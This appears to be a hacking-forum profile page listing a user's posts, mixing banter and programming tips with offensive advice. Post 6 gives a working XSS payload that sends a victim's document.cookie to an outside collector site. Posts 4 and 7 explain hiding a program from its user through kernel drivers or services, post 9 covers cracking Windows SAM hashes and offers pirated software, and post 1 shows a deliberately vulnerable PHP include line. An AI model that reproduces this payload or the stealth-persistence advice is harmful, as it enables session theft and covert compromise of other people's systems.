About Evil1

Profile Information

  • Location
    Uranius (heh heh)
  1. Go on Bugtraq or SecurityFocus, pick any package available and it will show you which packages have exploits in them, then go to the software's home page (example: SourceForge) and download the older version. It should contain the live vulnerable web app for the hacking / teaching. The only pitfall is either finding a vulnerable software package to download, or not enough info about the vulnerability. You could just write a quick guestbook app in PHP that doesn't run user input through htmlspecialchars() to demonstrate XSS, add a function to add users to demonstrate CSRF, add the following line of code to demonstrate Remote File Includes: <?php include($GLOBALS['setupdir'] . ".php"); // requires register_globals to be enabled ?> To show off SQL injection, you could give your guestbook app some MySQL interaction, say...the post id of the guest book, and grab the post id from a GET variable to demonstrate SQL injection. Either scenario you choose works, but I like live applications better.
  2. I didn't know you still posted here dual.
  3. Way to feed the bottom-feeding script kiddie community with this one, Irongeek. You make me sick.
  4. DLL injection perhaps, but I'm liking the null system driver idea. Driver == Full kernel control. Direct kernel object manipulation. You don't even have to worry about startup. Drivers are loaded on boot anyway.
  5. Here, this article explains what I'm talking about: http://www.tacktech.com/display.cfm?ttid=197
  6. He's right, this is a cookie collector code snippet. To use this bad boy, just use some JavaScript. <script>window.open("sitewithcookiecollector.com/cookie.php?c=" + document.cookie)</script> Load that script into some place that allows script tags, and just let the collector do the rest. Then all you gotta do is plug and play.
  7. Register the app as a service. Then start that service in the registry. Even if they look in the startup dir, or regkey, they won't find your prog.
  8. Use geo-location software. If they are from Africa, they shouldn't be able to go to the site.
  9. I've said this in past posts. The best Windows password cracker is SAMInside. You need both the SAM file, and the system file (for the syskey encryption table). The demo version comes with a handy command-line tool that will get the syskey file from the system file. The system file is like 8 meg at best, and the syskey file is no more than 16k. The demo isn't bad, but the full version is better. Message me for the full version. If you don't want to crack anything, get ahold of Passware WinKey. It's a bootable CD that skips all the BS and resets the admin password. Once again, there's a demo version (for use with just plain Windows) and the enterprise version. I like the enterprise version for its Windows network and Active Directory recovery support. And once again, just message me for that version.
  10. wait, logic as in phx2600 logic?
  11. Before all the penguin people try to turn the newbies into Linux heads, let me say something. There is nothing wrong with Windows. Exploits and such are found on it all the time. You don't need Linux to be a "uber 1337 h4x0r". Open source ain't shit if you don't understand what's going on. Try getting deep into Windows.
  12. damn ponyboy, forget your passwd here too?
  13. It's called winsock. Winsock can interact with BSD sockets. Devcpp can support winsock. Be sure to include the header file ws_32.h. winsock and winsock2.h are kind of deprecated. This site here has some great winsock tutorials and examples: http://tangentsoft.net/wskfaq/ If you encounter any problems with devcpp such as linker errors, do the following: go to project options, then select the tab parameters. Then click the button "add library or object". Now surf over to your /devcpp/lib/ directory and select the file libws2_32.a. That should do it.
  14. <flame / rant> Exploits....they're not point and click ware. They come uncompiled to keep kiddies from using them. They are typically written in C, or Perl, but I've seen many in PHP. If you don't know how to compile, then you shouldn't be messing with exploits in the first place. </flame / rant>
  15. Does anyone know of any good books on windows device driver development?